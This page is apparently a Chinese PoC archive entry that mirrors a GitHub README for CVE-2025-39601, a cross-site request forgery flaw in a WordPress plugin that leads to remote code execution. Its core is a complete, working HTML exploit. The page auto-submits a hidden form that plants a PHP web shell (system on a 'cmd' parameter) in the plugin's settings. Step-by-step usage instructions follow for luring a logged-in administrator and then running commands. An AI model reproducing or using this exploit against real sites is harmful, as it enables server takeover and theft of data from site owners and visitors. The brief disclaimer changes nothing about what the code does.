支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 319b31f53eeb8e172c577db1890a2363dbf51d56

来源
https://github.com/Nxploited/CVE-2025-39601
关联漏洞
标题:WordPress plugin Custom CSS, JS & PHP 跨站请求伪造漏洞 (CVE-2025-39601)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Custom CSS, JS & PHP 2.4.1及之前版本存在跨站请求伪造漏洞,该漏洞源于容易受到跨站请求伪造攻击,可能导致远程代码包含。
Description
WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability
介绍

# 🚨 CVE-2025-39601 - CSRF to RCE in WordPress Custom CSS, JS & PHP plugin <= 2.4.1

## 🧠 Description

A **Cross-Site Request Forgery (CSRF)** vulnerability in the **WPFactory Custom CSS, JS & PHP** plugin allows for **Remote Code Execution (RCE)** by injecting malicious PHP code via unauthorized POST requests.  
This affects all versions **up to and including 2.4.1**.

- **CVE ID:** CVE-2025-39601  
- **Published:** 2025-04-16  
- **Updated:** 2025-04-16  
- **Severity:** 🔥 9.6 (CRITICAL)  
- **CWE:** CWE-352 - Cross-Site Request Forgery  
- **CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`

---

## 🖼️ Visual Proof

Below is a screenshot showing the result of a successful exploitation, demonstrating how remote code can be executed via the URL parameter:

![Nxploited](https://github.com/Nxploited/CVE-2025-39601/blob/main/img.png)

---
![Nxploited](https://github.com/Nxploited/CVE-2025-39601/blob/main/IMG2.png)

---

## 💥 Proof of Concept (PoC)

```html
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
    <h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
    <p>By : Nxploited | Khaled Alenazi</p>
    <form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
        <input type="hidden" name="alg_custom_css_php_enabled" value="1">
        <input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
        <input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
        <input type="hidden" name="alg_ccjp_submit" value="php">
        <noscript><input type="submit" value="Submit"></noscript>
    </form>
</body>
</html>
```

---

## 🧪 Usage

1. Host the above HTML file on any external server or local environment.
2. While an **admin user is logged in**, visit the hosted HTML file in their browser.
3. This will silently submit the form and inject PHP code into the plugin’s settings.
4. The code is then executed automatically on every page load via the `plugins_loaded` hook.
5. Example execution:
   ```
   http://target-site.com/?cmd=whoami
   ```

---

## ⚠️ Disclaimer

This PoC is for **educational purposes only**.  
The author is **not responsible for any misuse or damage** caused by improper application of this information.  
Always test in controlled environments and with permission.

---

*By: Nxploited | Khaled Alenazi*
文件快照

 [4.0K]  /data/pocs/319b31f53eeb8e172c577db1890a2363dbf51d56
├── [ 46K]  IMG2.png
├── [ 39K]  img.png
├── [1.1K]  LICENSE
└── [2.5K]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。